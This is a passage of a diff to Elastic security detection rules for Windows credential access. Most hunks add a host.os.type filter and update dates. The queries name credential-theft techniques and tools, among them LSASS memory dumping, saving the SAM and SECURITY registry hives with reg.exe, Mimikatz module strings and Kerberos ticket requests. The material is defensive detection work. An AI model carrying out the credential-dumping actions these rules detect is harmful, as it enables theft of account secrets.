+4,7 @@ integration = ["system", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/02/01" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -75,7 +75,7 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.code:4738 and message:"'Don't Require Preauth' - Enabled" +event.code:4738 and host.os.type:windows and message:"'Don't Require Preauth' - Enabled" ''' diff --git a/rules/windows/credential_access_domain_backup_dpapi_private_keys.toml b/rules/windows/credential_access_domain_backup_dpapi_private_keys.toml index 2c02af1ac..77b693922 100644 --- a/rules/windows/credential_access_domain_backup_dpapi_private_keys.toml +++ b/rules/windows/credential_access_domain_backup_dpapi_private_keys.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -37,7 +37,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -file where event.type != "deletion" and file.name : ("ntds_capi_*.pfx", "ntds_capi_*.pvk") +file where host.os.type == "windows" and event.type != "deletion" and file.name : ("ntds_capi_*.pfx", "ntds_capi_*.pvk") ''' diff --git a/rules/windows/credential_access_dump_registry_hives.toml b/rules/windows/credential_access_dump_registry_hives.toml index d22d63ac8..577c684f0 100644 --- a/rules/windows/credential_access_dump_registry_hives.toml +++ b/rules/windows/credential_access_dump_registry_hives.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -77,7 +77,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and process.pe.original_file_name == "reg.exe" and process.args : ("save", "export") and process.args : ("hklm\\sam", "hklm\\security") diff --git a/rules/windows/credential_access_generic_localdumps.toml b/rules/windows/credential_access_generic_localdumps.toml index ebe6e5627..b47b6fc91 100644 --- a/rules/windows/credential_access_generic_localdumps.toml +++ b/rules/windows/credential_access_generic_localdumps.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -33,7 +33,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -registry where registry.path : "HKLM\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\LocalDumps\\DumpType" and +registry where host.os.type == "windows" and registry.path : "HKLM\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\LocalDumps\\DumpType" and registry.data.strings : ("2", "0x00000002") and not (process.executable : "?:\\Windows\\system32\\svchost.exe" and user.id : ("S-1-5-18", "S-1-5-19", "S-1-5-20")) ''' diff --git a/rules/windows/credential_access_iis_apppoolsa_pwd_appcmd.toml b/rules/windows/credential_access_iis_apppoolsa_pwd_appcmd.toml index 774174916..b57caf834 100644 --- a/rules/windows/credential_access_iis_apppoolsa_pwd_appcmd.toml +++ b/rules/windows/credential_access_iis_apppoolsa_pwd_appcmd.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -31,7 +31,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and (process.name : "appcmd.exe" or process.pe.original_file_name == "appcmd.exe") and process.args : "/list" and process.args : "/text*password" ''' diff --git a/rules/windows/credential_access_iis_connectionstrings_dumping.toml b/rules/windows/credential_access_iis_connectionstrings_dumping.toml index 8656c27ce..6bd5e3aec 100644 --- a/rules/windows/credential_access_iis_connectionstrings_dumping.toml +++ b/rules/windows/credential_access_iis_connectionstrings_dumping.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -35,7 +35,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and (process.name : "aspnet_regiis.exe" or process.pe.original_file_name == "aspnet_regiis.exe") and process.args : "connectionStrings" and process.args : "-pdf" ''' diff --git a/rules/windows/credential_access_kerberoasting_unusual_process.toml b/rules/windows/credential_access_kerberoasting_unusual_process.toml index 8a5abed0d..d3aa578c5 100644 --- a/rules/windows/credential_access_kerberoasting_unusual_process.toml +++ b/rules/windows/credential_access_kerberoasting_unusual_process.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/02" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2023/01/31" +updated_date = "2023/02/22" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" @@ -87,7 +87,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -network where event.type == "start" and network.direction : ("outgoing", "egress") and +network where host.os.type == "windows" and event.type == "start" and network.direction : ("outgoing", "egress") and destination.port == 88 and source.port >= 49152 and process.pid != 4 and not process.executable : ("?:\\Windows\\System32\\lsass.exe", diff --git a/rules/windows/credential_access_ldap_attributes.toml b/rules/windows/credential_access_ldap_attributes.toml index 4a28b83ce..f37970ea8 100644 --- a/rules/windows/credential_access_ldap_attributes.toml +++ b/rules/windows/credential_access_ldap_attributes.toml @@ -4,7 +4,7 @@ integration = ["system", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/02/01" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -48,7 +48,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -any where event.action == "Directory Service Access" and event.code == "4662" and +any where host.os.type == "windows" and event.action == "Directory Service Access" and event.code == "4662" and not winlog.event_data.SubjectUserSid : "S-1-5-18" and diff --git a/rules/windows/credential_access_lsass_handle_via_malseclogon.toml b/rules/windows/credential_access_lsass_handle_via_malseclogon.toml index 3a0bb00b5..312dc9870 100644 --- a/rules/windows/credential_access_lsass_handle_via_malseclogon.toml +++ b/rules/windows/credential_access_lsass_handle_via_malseclogon.toml @@ -4,7 +4,7 @@ integration = ["windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -31,7 +31,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.code == "10" and +process where host.os.type == "windows" and event.code == "10" and winlog.event_data.TargetImage : "?:\\WINDOWS\\system32\\lsass.exe" and /* seclogon service accessing lsass */ diff --git a/rules/windows/credential_access_lsass_loaded_susp_dll.toml b/rules/windows/credential_access_lsass_loaded_susp_dll.toml index ba57403c6..7b7547086 100644 --- a/rules/windows/credential_access_lsass_loaded_susp_dll.toml +++ b/rules/windows/credential_access_lsass_loaded_susp_dll.toml @@ -4,7 +4,7 @@ maturity = "production" integration = ["endpoint"] min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/28" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -34,7 +34,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -library where process.executable : "?:\\Windows\\System32\\lsass.exe" and +library where host.os.type == "windows" and process.executable : "?:\\Windows\\System32\\lsass.exe" and not (dll.code_signature.subject_name : ("Microsoft Windows", "Microsoft Corporation", diff --git a/rules/windows/credential_access_lsass_memdump_file_created.toml b/rules/windows/credential_access_lsass_memdump_file_created.toml index 6fe0c91a1..9a68b25ac 100644 --- a/rules/windows/credential_access_lsass_memdump_file_created.toml +++ b/rules/windows/credential_access_lsass_memdump_file_created.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/02/06" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -84,7 +84,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -file where file.name : ("lsass*.dmp", "dumpert.dmp", "Andrew.dmp", "SQLDmpr*.mdmp", "Coredump.dmp") and +file where host.os.type == "windows" and file.name : ("lsass*.dmp", "dumpert.dmp", "Andrew.dmp", "SQLDmpr*.mdmp", "Coredump.dmp") and not (process.executable : ("?:\\Program Files\\Microsoft SQL Server\\*\\Shared\\SqlDumper.exe", "?:\\Windows\\System32\\dllhost.exe") and file.path : ("?:\\Program Files\\Microsoft SQL Server\\*\\Shared\\ErrorDumps\\SQLDmpr*.mdmp", diff --git a/rules/windows/credential_access_lsass_memdump_handle_access.toml b/rules/windows/credential_access_lsass_memdump_handle_access.toml index fb6cc1b99..e19319703 100644 --- a/rules/windows/credential_access_lsass_memdump_handle_access.toml +++ b/rules/windows/credential_access_lsass_memdump_handle_access.toml @@ -108,7 +108,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -any where event.action == "File System" and event.code == "4656" and +any where host.os.type == "windows" and event.action == "File System" and event.code == "4656" and winlog.event_data.ObjectName : ( "?:\\Windows\\System32\\lsass.exe", diff --git a/rules/windows/credential_access_mimikatz_memssp_default_logs.toml b/rules/windows/credential_access_mimikatz_memssp_default_logs.toml index 501fcf769..b8cfb8edc 100644 --- a/rules/windows/credential_access_mimikatz_memssp_default_logs.toml +++ b/rules/windows/credential_access_mimikatz_memssp_default_logs.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -76,7 +76,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -file where file.name : "mimilsa.log" and process.name : "lsass.exe" +file where host.os.type == "windows" and file.name : "mimilsa.log" and process.name : "lsass.exe" ''' diff --git a/rules/windows/credential_access_mimikatz_powershell_module.toml b/rules/windows/credential_access_mimikatz_powershell_module.toml index eb2b6d4d1..5401e2cec 100644 --- a/rules/windows/credential_access_mimikatz_powershell_module.toml +++ b/rules/windows/credential_access_mimikatz_powershell_module.toml @@ -4,7 +4,7 @@ integration = ["windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/01/05" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -96,7 +96,7 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.category:process and +event.category:process and host.os.type:windows and powershell.file.script_block_text:( (DumpCreds and DumpCerts) or diff --git a/rules/windows/credential_access_mod_wdigest_security_provider.toml b/rules/windows/credential_access_mod_wdigest_security_provider.toml index d76b82fbb..96e3299f3 100644 --- a/rules/windows/credential_access_mod_wdigest_security_provider.toml +++ b/rules/windows/credential_access_mod_wdigest_security_provider.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -88,7 +88,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -registry where event.type : ("creation", "change") and +registry where host.os.type == "windows" and event.type : ("creation", "change") and registry.path : ( "HKLM\\SYSTEM\\*ControlSet*\\Control\\SecurityProviders\\WDigest\\UseLogonCredential", "\\REGISTRY\\MACHINE\\SYSTEM\\*ControlSet*\\Control\\SecurityProviders\\WDigest\\UseLogonCredential" diff --git a/rules/windows/credential_access_moving_registry_hive_via_smb.toml b/rules/windows/credential_access_moving_registry_hive_via_smb.toml index 09152d849..14901d5f6 100644 --- a/rules/windows/credential_access_moving_registry_hive_via_smb.toml +++ b/rules/windows/credential_access_moving_registry_hive_via_smb.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -69,7 +69,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -file where event.type == "creation" and +file where host.os.type == "windows" and event.type == "creation" and /* regf file header */ file.Ext.header_bytes : "72656766*" and file.size >= 30000 and process.pid == 4 and user.id : ("S-1-5-21*", "S-1-12-1-*") diff --git a/rules/windows/credential_access_persistence_network_logon_provider_modification.toml b/rules/windows/credential_access_persistence_network_logon_provider_modification.toml index a51f3a202..5792108b2 100644 --- a/rules/windows/credential_access_persistence_network_logon_provider_modification.toml +++ b/rules/windows/credential_access_persistence_network_logon_provider_modification.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -31,7 +31,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -registry where registry.data.strings != null and +registry where host.os.type == "windows" and registry.data.strings != null and registry.path : ( "HKLM\\SYSTEM\\*ControlSet*\\Services\\*\\NetworkProvider\\ProviderPath", "\\REGISTRY\\MACHINE\\SYSTEM\\*ControlSet*\\Services\\*\\NetworkProvider\\ProviderPath" diff --git a/rules/windows/credential_access_posh_invoke_ninjacopy.toml b/rules/windows/credential_access_posh_invoke_ninjacopy.toml index c57b8ff8a..9b8126f40 100644 --- a/rules/windows/credential_access_posh_invoke_ninjacopy.toml +++ b/rules/windows/credential_access_posh_invoke_ninjacopy.toml @@ -4,7 +4,7 @@ integration = ["windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/01/23" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -28,7 +28,7 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.category:process and +event.category:process and host.os.type:windows and powershell.file.script_block_text : ( "StealthReadFile" or "StealthReadFileAddr" or diff --git a/rules/windows/credential_access_posh_minidump.toml b/rules/windows/credential_access_posh_minidump.toml index 5646f58fd..fe9041c13 100644 --- a/rules/windows/credential_access_posh_minidump.toml +++ b/rules/windows/credential_access_posh_minidump.toml @@ -4,7 +4,7 @@ integration = ["windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/01/05" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -85,7 +85,7 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.category:process and powershell.file.script_block_text:(MiniDumpWriteDump or MiniDumpWithFullMemory or pmuDetirWpmuDiniM) and not user.id : "S-1-5-18" +event.category:process and host.os.type:windows and powershell.file.script_block_text:(MiniDumpWriteDump or MiniDumpWithFullMemory or pmuDetirWpmuDiniM) and not user.id : "S-1-5-18" ''' diff --git a/rules/windows/credential_access_posh_request_ticket.toml b/rules/windows/credential_access_posh_request_ticket.toml index 9e4d39463..6191ae909 100644 --- a/rules/windows/credential_access_posh_request_ticket.toml +++ b/rules/windows/credential_access_posh_request_ticket.toml @@ -4,7 +4,7 @@ integration = ["windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/01/05" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -81,7 +81,7 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.category:process and +event.category:process and host.os.type:windows and powershell.file.script_block_text : ( KerberosRequestorSecurityToken ) and not user.id : "S-1-5-18" diff --git a/rules/windows/credential_access_potential_lsa_memdump_via_mirrordump.toml b/rules/windows/credential_access_potential_lsa_memdump_via_mirrordump.toml index 82a9175bf..06d4aad1c 100644 --- a/rules/windows/credential_access_potential_lsa_memdump_via_mirrordump.toml +++ b/rules/windows/credential_access_potential_lsa_memdump_via_mirrordump.toml @@ -4,7 +4,7 @@ integration = ["windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -30,7 +30,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.code == "10" and +process where host.os.type == "windows" and event.code == "10" and /* LSASS requesting DuplicateHandle access right to another process */ process.name : "lsass.exe" and winlog.event_data.GrantedAccess == "0x40" and diff --git a/rules/windows/credential_access_relay_ntlm_auth_via_http_spoolss.toml b/rules/windows/credential_access_relay_ntlm_auth_via_http_spoolss.toml index a261356bd..24ee1c504 100644 --- a/rules/windows/credential_access_relay_ntlm_auth_via_http_spoolss.toml +++ b/rules/windows/credential_access_relay_ntlm_auth_via_http_spoolss.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -30,7 +30,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and process.name : "rundll32.exe" and /* Rundll32 WbeDav Client */ diff --git a/rules/windows/credential_access_remote_sam_secretsdump.toml b/rules/windows/credential_access_remote_sam_secretsdump.toml index 84e355e24..2478c7b81 100644 --- a/rules/windows/credential_access_remote_sam_secretsdump.toml +++ b/rules/windows/credential_access_remote_sam_secretsdump.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "system", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/02/01" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -82,7 +82,7 @@ sequence by host.id, user.id with maxspan=1m event.outcome == "success" and event.action == "logged-in" and winlog.logon.type == "Network" and not user.name == "ANONYMOUS LOGON" and not user.domain == "NT AUTHORITY" and source.ip != "127.0.0.1" and source.ip !="::1"] - [file where event.action == "creation" and process.name : "svchost.exe" and + [file where host.os.type == "windows" and event.action == "creation" and process.name : "svchost.exe" and file.Ext.header_bytes : "72656766*" and user.id : ("S-1-5-21-*", "S-1-12-1-*") and file.size >= 30000 and not file.path : ("?:\\Windows\\system32\\HKEY_LOCAL_MACHINE_SOFTWARE_Microsoft_*.registry", diff --git a/rules/windows/credential_access_saved_creds_vault_winlog.toml b/rules/windows/credential_access_saved_creds_vault_winlog.toml index 840624ca6..1a18d6709 100644 --- a/rules/windows/credential_access_saved_creds_vault_winlog.toml +++ b/rules/windows/credential_access_saved_creds_vault_winlog.toml @@ -4,7 +4,7 @@ integration = ["system", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/02/01" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -37,11 +37,11 @@ sequence by winlog.computer_name, winlog.process.pid with maxspan=1s /* 2 consecutive vault reads from same pid for web creds */ - [any where event.code : "5382" and + [any where host.os.type == "windows" and event.code : "5382" and (winlog.event_data.SchemaFriendlyName : "Windows Web Password Credential" or winlog.event_data.Resource : "http*") and not winlog.event_data.SubjectLogonId : "0x3e7"] - [any where event.code : "5382" and + [any where host.os.type == "windows" and event.code : "5382" and (winlog.event_data.SchemaFriendlyName : "Windows Web Password Credential" or winlog.event_data.Resource : "http*") and not winlog.event_data.SubjectLogonId : "0x3e7"] ''' diff --git a/rules/windows/credential_access_saved_creds_vaultcmd.toml b/rules/windows/credential_access_saved_creds_vaultcmd.toml index f94fd6218..b08967846 100644 --- a/rules/windows/credential_access_saved_creds_vaultcmd.toml +++ b/rules/windows/credential_access_saved_creds_vaultcmd.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -35,7 +35,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and (process.pe.original_file_name:"vaultcmd.exe" or process.name:"vaultcmd.exe") and process.args:"/list*" ''' diff --git a/rules/windows/credential_access_seenabledelegationprivilege_assigned_to_user.toml b/rules/windows/credential_access_seenabledelegationprivilege_assigned_to_user.toml index 74b06c701..80dd6032c 100644 --- a/rules/windows/credential_access_seenabledelegationprivilege_assigned_to_user.toml +++ b/rules/windows/credential_access_seenabledelegationprivilege_assigned_to_user.toml @@ -4,7 +4,7 @@ integration = ["system", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/02/01" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -90,7 +90,8 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.action: "Authorization Policy Change" and event.code:4704 and winlog.event_data.PrivilegeList:"SeEnableDelegationPrivilege" +event.action:"Authorization Policy Change" and host.os.type:windows and event.code:4704 and + winlog.event_data.PrivilegeList:"SeEnableDelegationPrivilege" ''' diff --git a/rules/windows/credential_access_shadow_credentials.toml b/rules/windows/credential_access_shadow_credentials.toml index 4e7d31759..a3c4b501e 100644 --- a/rules/windows/credential_access_shadow_credentials.toml +++ b/rules/windows/credential_access_shadow_credentials.toml @@ -4,7 +4,7 @@ integration = ["system", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/02/06" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -44,7 +44,7 @@ Attackers with write privileges on this attribute over an object can abuse it to ### False positive analysis -- Administrators might use custom accounts on Azure AD Connect. If this is the case, make sure the account is properly secured. You can also create an exception for the account if expected activity makes too much noise in your environment. +- Administrators might use custom accounts on Azure AD Connect. If this is the case, make sure the account is properly secured. You can also create an exception for the account if expected activity makes too much noise in your environment. ### Response and remediation @@ -92,8 +92,9 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.action:"Directory Service Changes" and event.code:"5136" and - winlog.event_data.AttributeLDAPDisplayName:"msDS-KeyCredentialLink" and winlog.event_data.AttributeValue :B\:828* and not winlog.event_data.SubjectUserName: MSOL_* +event.action:"Directory Service Changes" and host.os.type:windows and event.code:"5136" and + winlog.event_data.AttributeLDAPDisplayName:"msDS-KeyCredentialLink" and winlog.event_data.AttributeValue :B\:828* and + not winlog.event_data.SubjectUserName: MSOL_* ''' diff --git a/rules/windows/credential_access_spn_attribute_modified.toml b/rules/windows/credential_access_spn_attribute_modified.toml index 5c061a5e6..c5d4f1461 100644 --- a/rules/windows/credential_access_spn_attribute_modified.toml +++ b/rules/windows/credential_access_spn_attribute_modified.toml @@ -4,7 +4,7 @@ integration = ["system", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/02/01" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -99,8 +99,9 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.action:"Directory Service Changes" and event.code:5136 and winlog.event_data.ObjectClass:"user" -and winlog.event_data.AttributeLDAPDisplayName:"servicePrincipalName" +event.action:"Directory Service Changes" and host.os.type:windows and + event.code:5136 and winlog.event_data.ObjectClass:"user" and + winlog.event_data.AttributeLDAPDisplayName:"servicePrincipalName" ''' diff --git a/rules/windows/credential_access_suspicious_comsvcs_imageload.toml b/rules/windows/credential_access_suspicious_comsvcs_imageload.toml index a52c218d3..51068d5b1 100644 --- a/rules/windows/credential_access_suspicious_comsvcs_imageload.toml +++ b/rules/windows/credential_access_suspicious_comsvcs_imageload.toml @@ -4,7 +4,7 @@ integration = ["windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -31,9 +31,9 @@ type = "eql" query = ''' sequence by process.entity_id with maxspan=1m - [process where event.category == "process" and + [process where host.os.type == "windows" and event.category == "process" and process.name : "rundll32.exe"] - [process where event.category == "process" and event.dataset : "windows.sysmon_operational" and event.code == "7" and + [process where host.os.type == "windows" and event.category == "process" and event.dataset : "windows.sysmon_operational" and event.code == "7" and (file.pe.original_file_name : "COMSVCS.DLL" or file.pe.imphash : "EADBCCBB324829ACB5F2BBE87E5549A8") and /* renamed COMSVCS */ not file.name : "COMSVCS.DLL"] diff --git a/rules/windows/credential_access_suspicious_lsass_access_generic.toml b/rules/windows/credential_access_suspicious_lsass_access_generic.toml index 99364a3bf..bfbc7ecbe 100644 --- a/rules/windows/credential_access_suspicious_lsass_access_generic.toml +++ b/rules/windows/credential_access_suspicious_lsass_access_generic.toml @@ -4,7 +4,7 @@ integration = ["windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/01/22" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -28,7 +28,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.code == "10" and +process where host.os.type == "windows" and event.code == "10" and winlog.event_data.TargetImage : "?:\\WINDOWS\\system32\\lsass.exe" and not winlog.event_data.GrantedAccess : ("0x1000", "0x1400", "0x101400", "0x101000", "0x101001", "0x100000", "0x100040", "0x3200", "0x40", "0x3200") and diff --git a/rules/windows/credential_access_suspicious_lsass_access_memdump.toml b/rules/windows/credential_access_suspicious_lsass_access_memdump.toml index eaf90c23f..434268ca5 100644 --- a/rules/windows/credential_access_suspicious_lsass_access_memdump.toml +++ b/rules/windows/credential_access_suspicious_lsass_access_memdump.toml @@ -4,7 +4,7 @@ integration = ["windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -33,7 +33,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.code == "10" and +process where host.os.type == "windows" and event.code == "10" and winlog.event_data.TargetImage : "?:\\WINDOWS\\system32\\lsass.exe" and /* DLLs exporting MiniDumpWriteDump API to create an lsass mdmp*/ diff --git a/rules/windows/credential_access_suspicious_lsass_access_via_snapshot.toml b/rules/windows/credential_access_suspicious_lsass_access_via_snapshot.toml index df729969f..667f0113a 100644 --- a/rules/windows/credential_access_suspicious_lsass_access_via_snapshot.toml +++ b/rules/windows/credential_access_suspicious_lsass_access_via_snapshot.toml @@ -4,7 +4,7 @@ integration = ["windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -34,7 +34,7 @@ timestamp_override = "event.ingested" type = "threshold" query = ''' -event.category:process and event.code:10 and +event.category:process and host.os.type:windows and event.code:10 and winlog.event_data.TargetImage:("C:\\Windows\\system32\\lsass.exe" or "c:\\Windows\\system32\\lsass.exe" or "c:\\Windows\\System32\\lsass.exe") diff --git a/rules/windows/credential_access_suspicious_winreg_access_via_sebackup_priv.toml b/rules/windows/credential_access_suspicious_winreg_access_via_sebackup_priv.toml index cd8f3a6e5..6781f76d8 100644 --- a/rules/windows/credential_access_suspicious_winreg_access_via_sebackup_priv.toml +++ b/rules/windows/credential_access_suspicious_winreg_access_via_sebackup_priv.toml @@ -4,7 +4,7 @@ integration = ["system", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/02/01" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -89,12 +89,12 @@ type = "eql" query = ''' sequence by winlog.computer_name, winlog.event_data.SubjectLogonId with maxspan=1m - [iam where event.action == "logged-in-special" and + [iam where host.os.type == "windows" and event.action == "logged-in-special" and winlog.event_data.PrivilegeList : "SeBackupPrivilege" and /* excluding accounts with existing privileged access */ not winlog.event_data.PrivilegeList : "SeDebugPrivilege"] - [any where event.action == "Detailed File Share" and winlog.event_data.RelativeTargetName : "winreg"] + [any where host.os.type == "windows" and event.action == "Detailed File Share" and winlog.event_data.RelativeTargetName : "winreg"] ''' diff --git a/rules/windows/credential_access_symbolic_link_to_shadow_copy_created.toml b/rules/windows/credential_access_symbolic_link_to_shadow_copy_created.toml index 121357be4..9e490f091 100644 --- a/rules/windows/credential_access_symbolic_link_to_shadow_copy_created.toml +++ b/rules/windows/credential_access_symbolic_link_to_shadow_copy_created.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic", "Austin Songer"] @@ -100,7 +100,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type in ("start","process_created") and +process where host.os.type == "windows" and event.type == "start" and process.pe.original_file_name in ("Cmd.Exe","PowerShell.EXE") and /* Create Symbolic Link to Shadow Copies */ diff --git a/rules/windows/credential_access_via_snapshot_lsass_clone_creation.toml b/rules/windows/credential_access_via_snapshot_lsass_clone_creation.toml index 288fbd574..dfbe2d103 100644 --- a/rules/windows/credential_access_via_snapshot_lsass_clone_creation.toml +++ b/rules/windows/credential_access_via_snapshot_lsass_clone_creation.toml @@ -4,7 +4,7 @@ integration = ["windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" 